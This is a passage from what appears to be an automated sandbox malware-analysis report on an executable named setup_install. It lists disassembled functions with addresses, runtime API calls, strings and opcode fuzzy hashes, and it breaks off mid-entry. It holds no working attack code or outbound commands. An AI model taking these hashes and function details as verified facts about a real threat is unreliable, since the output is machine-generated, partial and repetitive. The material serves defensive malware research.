                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: wcslen
                                                                                                                            • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$J&J$basic_string::compare
                                                                                                                            • API String ID: 4088430540-2415707932
                                                                                                                            • Opcode ID: 7e129a5df3ebf909ebba0452e0a88f92655778b9584c0bb22c1e63f51d94e64b
                                                                                                                            • Instruction ID: a4c71f5373dcdab49a886cb235488190d28e53ec465d8f1a7c0ce118d4dcd17a
                                                                                                                            • Opcode Fuzzy Hash: 7e129a5df3ebf909ebba0452e0a88f92655778b9584c0bb22c1e63f51d94e64b
                                                                                                                            • Instruction Fuzzy Hash: ECA1CF72B042118BC714DE2EE5C041BBBE6EBE5354F54C42EE98887310D376DC96CB96
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040B180 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 253COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: default arg#$}::
                                                                                                                            • API String ID: 0-679881875
                                                                                                                            • Opcode ID: a1a6506377d959c0e55235ee37c35dd92ef5f2a5a577a40c35b0f10a20982f38
                                                                                                                            • Instruction ID: 0837e80c821a50f083a5f3d2a3ea0cf4b816092b787e11a7748884e1cfe2af1a
                                                                                                                            • Opcode Fuzzy Hash: a1a6506377d959c0e55235ee37c35dd92ef5f2a5a577a40c35b0f10a20982f38
                                                                                                                            • Instruction Fuzzy Hash: 72B197706087418BC325DF28C4947ABBBE1EF95304F14887ED4D99B382C379A985DB9E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00414489 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 251COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memcpy
                                                                                                                            • String ID: $!
                                                                                                                            • API String ID: 3510742995-2056089098
                                                                                                                            • Opcode ID: 175c2bbd42d784311cba376677c19592a4b338b393f0a7203970a1532a205209
                                                                                                                            • Instruction ID: f515f3aab1b47b34869c08bbc80c1ca7397ca99299d3527f2a85eb40bcd468e9
                                                                                                                            • Opcode Fuzzy Hash: 175c2bbd42d784311cba376677c19592a4b338b393f0a7203970a1532a205209
                                                                                                                            • Instruction Fuzzy Hash: 82B1F9B1A097418FC720EF69C18469FBBE1BF88744F45492EE9C987311E778D884CB86
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00413D59 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 241COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0041A9D0: LeaveCriticalSection.KERNEL32(?,?,?,?,-00000001,-00000001,00000010,0041B38B), ref: 0041AA0E
                                                                                                                            • memcpy.MSVCRT ref: 00413DC5
                                                                                                                            • memcpy.MSVCRT ref: 00413E00
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memcpy$CriticalLeaveSection
                                                                                                                            • String ID: $!
                                                                                                                            • API String ID: 2458919216-2056089098
                                                                                                                            • Opcode ID: 15a9dd3cd449f037c72db821a09be61a4e465b250566c2e80d2183f9b477a8e4
                                                                                                                            • Instruction ID: 6096b5cb34d566d6648ed570fcaf927f3d3f43bd6e698a28de9721c9e8b151af
                                                                                                                            • Opcode Fuzzy Hash: 15a9dd3cd449f037c72db821a09be61a4e465b250566c2e80d2183f9b477a8e4
                                                                                                                            • Instruction Fuzzy Hash: 46A108B1A097458FC720EF29C18469BBBE1BF88744F41492EF9C987311E778D894CB86
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004076C4 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 163COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: .${default arg#$}::
                                                                                                                            • API String ID: 0-723286900
                                                                                                                            • Opcode ID: 06a5af8705d996fe68e7282e8ed80806b84f83e41f9a789832d5500d7e6e8211
                                                                                                                            • Instruction ID: 53eb363e413d20a7d0310b3c19a604834b59e0d954d0d1155ef844d4d9cc3474
                                                                                                                            • Opcode Fuzzy Hash: 06a5af8705d996fe68e7282e8ed80806b84f83e41f9a789832d5500d7e6e8211
                                                                                                                            • Instruction Fuzzy Hash: 84713271508242CBC7118F28C0D43A67BE1AFA5314F1884BEECC99F387D7B99885EB65
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004074E0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 141COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: parm#$this$}
                                                                                                                            • API String ID: 0-728413427
                                                                                                                            • Opcode ID: ce7e3a67f37e0249e7cb52b679950038d0bee90e5afb835c2af35b484dd98b66
                                                                                                                            • Instruction ID: 124cdf2980d0913ffd7162627be26521f0a26f9ea89a4f921bef30c491db8fe9
                                                                                                                            • Opcode Fuzzy Hash: ce7e3a67f37e0249e7cb52b679950038d0bee90e5afb835c2af35b484dd98b66
                                                                                                                            • Instruction Fuzzy Hash: 39616E7150D2428BDB11CF28C1C43A57BE1AFA5304F1884BEECC89F38AD7799885DB66
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040663C Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 113stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: strcmp
                                                                                                                            • String ID: $ : $new
                                                                                                                            • API String ID: 1004003707-2075650739
                                                                                                                            • Opcode ID: da3536e9bd4966efba2d39d845945bc4c1adeba4a981a1ce7097ee4b9939269f
                                                                                                                            • Instruction ID: 50c738ba76b8e6303c177d07761edf72093fec6855b52476b183944807612b33
                                                                                                                            • Opcode Fuzzy Hash: da3536e9bd4966efba2d39d845945bc4c1adeba4a981a1ce7097ee4b9939269f
                                                                                                                            • Instruction Fuzzy Hash: 45511A35704205CFCB04DF28C48469AB7E2EF89314F15857AEC89AB396C779ED4ACB85
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00411390 Relevance: 6.1, APIs: 4, Instructions: 97COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • IsDBCSLeadByteEx.KERNEL32 ref: 004113E4
                                                                                                                            • MultiByteToWideChar.KERNEL32 ref: 00411427
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Byte$CharLeadMultiWide
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2561704868-0
                                                                                                                            • Opcode ID: 08e2924a09e4d217d0cca1413e4d4ea655a1a0b206110ab0e4126e4c5536f9f1
                                                                                                                            • Instruction ID: 0c472794b3f9483aae0e3d438b42691774454acb7b5c47e7d1c524d5d9ee08cb
                                                                                                                            • Opcode Fuzzy Hash: 08e2924a09e4d217d0cca1413e4d4ea655a1a0b206110ab0e4126e4c5536f9f1
                                                                                                                            • Instruction Fuzzy Hash: 474125B05093518FD710DF28D58429BBBE0BF86714F44892EE9D58B3A0D37AD889CB47
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040667A Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 96stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: strcmp
                                                                                                                            • String ID: ]$q0J
                                                                                                                            • API String ID: 1004003707-898455572
                                                                                                                            • Opcode ID: d01b49ee8f6300e6346ce9db5b3a1de458f2638c3bb182e165a60fb4b32bf7b5
                                                                                                                            • Instruction ID: 7281c983653d816fb114e12a055fa31714bb176d9f3307150a92ceed85ce39fa
                                                                                                                            • Opcode Fuzzy Hash: d01b49ee8f6300e6346ce9db5b3a1de458f2638c3bb182e165a60fb4b32bf7b5
                                                                                                                            • Instruction Fuzzy Hash: AE41F274604245CFDB10DF28C4C879A7BE1EF59318F0885BAEC889F356C379A885DB95
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00412820 Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _errno$_fileno_lseeki64
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2364285915-0
                                                                                                                            • Opcode ID: 564f6544045ae32cfacd75039799d20a47d35b019d69a92b6308b2106e6ba471
                                                                                                                            • Instruction ID: e689f135fbf1f9788c07a544abb833863acfc3cd974303639e5cd7b0c52497fa
                                                                                                                            • Opcode Fuzzy Hash: 564f6544045ae32cfacd75039799d20a47d35b019d69a92b6308b2106e6ba471
                                                                                                                            • Instruction Fuzzy Hash: 801182B15147048FC7107F6AC9812AAB790EF41374F548A1FE4A4CB3D2D7BC88D28B9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00410F79 Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • pthread_getspecific.LIBWINPTHREAD-1(?,?,?,?,?,?,?,?,?,?,00495FEF), ref: 00410F4A
                                                                                                                            • pthread_once.LIBWINPTHREAD-1 ref: 00410F8F
                                                                                                                            • pthread_mutex_lock.LIBWINPTHREAD-1 ref: 00410F9B
                                                                                                                            • pthread_mutex_unlock.LIBWINPTHREAD-1 ref: 00410FB2
                                                                                                                            • calloc.MSVCRT ref: 00410FD1
                                                                                                                            • pthread_setspecific.LIBWINPTHREAD-1 ref: 00410FEE
                                                                                                                            • realloc.MSVCRT ref: 0041107E
                                                                                                                            • memset.MSVCRT ref: 004110AB
                                                                                                                            • pthread_setspecific.LIBWINPTHREAD-1 ref: 004110BC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: pthread_setspecific$callocmemsetpthread_getspecificpthread_mutex_lockpthread_mutex_unlockpthread_oncerealloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2529906858-0
                                                                                                                            • Opcode ID: c5d62508838ffb49f9c7e9db1b7179a364d21fee59d3ebd130eb7cc6c81ef8c6
                                                                                                                            • Instruction ID: ebe298e6c72d373ea8215657b637382520cf3d7305c19849a62f80c8d21465fe
                                                                                                                            • Opcode Fuzzy Hash: c5d62508838ffb49f9c7e9db1b7179a364d21fee59d3ebd130eb7cc6c81ef8c6
                                                                                                                            • Instruction Fuzzy Hash: 72F09675A087508BC710AF56D48129DB790EF44749F45482FEA8457B56C3B8A8C187DE
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00411570 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ___lc_codepage_func.MSVCRT ref: 00411595
                                                                                                                            • ___mb_cur_max_func.MSVCRT ref: 0041159E
                                                                                                                              • Part of subcall function 00411390: IsDBCSLeadByteEx.KERNEL32 ref: 004113E4
                                                                                                                              • Part of subcall function 00411390: MultiByteToWideChar.KERNEL32 ref: 00411427
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Byte$CharLeadMultiWide___lc_codepage_func___mb_cur_max_func
                                                                                                                            • String ID: 4TN
                                                                                                                            • API String ID: 2785433807-2475712665
                                                                                                                            • Opcode ID: aeac038c9e04fd11fdb6131c9efd3e27f40c9c87867a8f0fea3376ab590f4072
                                                                                                                            • Instruction ID: 0f8636272c4b2311f3acb345321f3cb4d789100f3b510c306b27cdc35b076b54
                                                                                                                            • Opcode Fuzzy Hash: aeac038c9e04fd11fdb6131c9efd3e27f40c9c87867a8f0fea3376ab590f4072
                                                                                                                            • Instruction Fuzzy Hash: 56311771A093059FC7109F6AD88029BFBE4BFC8394F08882EF999D7310E734D8408B46
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040C790 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            • Unknown error, xrefs: 0040C792
                                                                                                                            • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 0040C7E3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: fprintf
                                                                                                                            • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                            • API String ID: 383729395-3474627141
                                                                                                                            • Opcode ID: b3bf6479440279100d6d3727241235299ada2c597753f876ec6961913ded040d
                                                                                                                            • Instruction ID: a603ccb5bd6b6591a9d28679050d3fae5d174e97e6881aa0715814e7b8d835ab
                                                                                                                            • Opcode Fuzzy Hash: b3bf6479440279100d6d3727241235299ada2c597753f876ec6961913ded040d
                                                                                                                            • Instruction Fuzzy Hash: A901D2B4008B85CBD300AF15E48842EBFF1FFCA354F46889DE5C507265CB3698A8CB4A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00411510 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ___mb_cur_max_func.MSVCRT ref: 0041152E
                                                                                                                            • ___lc_codepage_func.MSVCRT ref: 00411535
                                                                                                                              • Part of subcall function 00411390: IsDBCSLeadByteEx.KERNEL32 ref: 004113E4
                                                                                                                              • Part of subcall function 00411390: MultiByteToWideChar.KERNEL32 ref: 00411427
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Byte$CharLeadMultiWide___lc_codepage_func___mb_cur_max_func
                                                                                                                            • String ID: 8TN
                                                                                                                            • API String ID: 2785433807-2592774653
                                                                                                                            • Opcode ID: 78c049b7b2c143bef496a94f03669f9fb4dd60c99ee7389e97629c3dde0e44fc
                                                                                                                            • Instruction ID: ded7d81f9dde38481c62e28589f9a7ea7b4f874b19a93d98dead06007ea0d613
                                                                                                                            • Opcode Fuzzy Hash: 78c049b7b2c143bef496a94f03669f9fb4dd60c99ee7389e97629c3dde0e44fc
                                                                                                                            • Instruction Fuzzy Hash: 58F0F475A183148F8700DF69D08165BFBE4EEC9644F408D2EF994D7221E334D9448B96
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00411680 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ___mb_cur_max_func.MSVCRT ref: 00411690
                                                                                                                            • ___lc_codepage_func.MSVCRT ref: 00411697
                                                                                                                              • Part of subcall function 00411390: IsDBCSLeadByteEx.KERNEL32 ref: 004113E4
                                                                                                                              • Part of subcall function 00411390: MultiByteToWideChar.KERNEL32 ref: 00411427
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
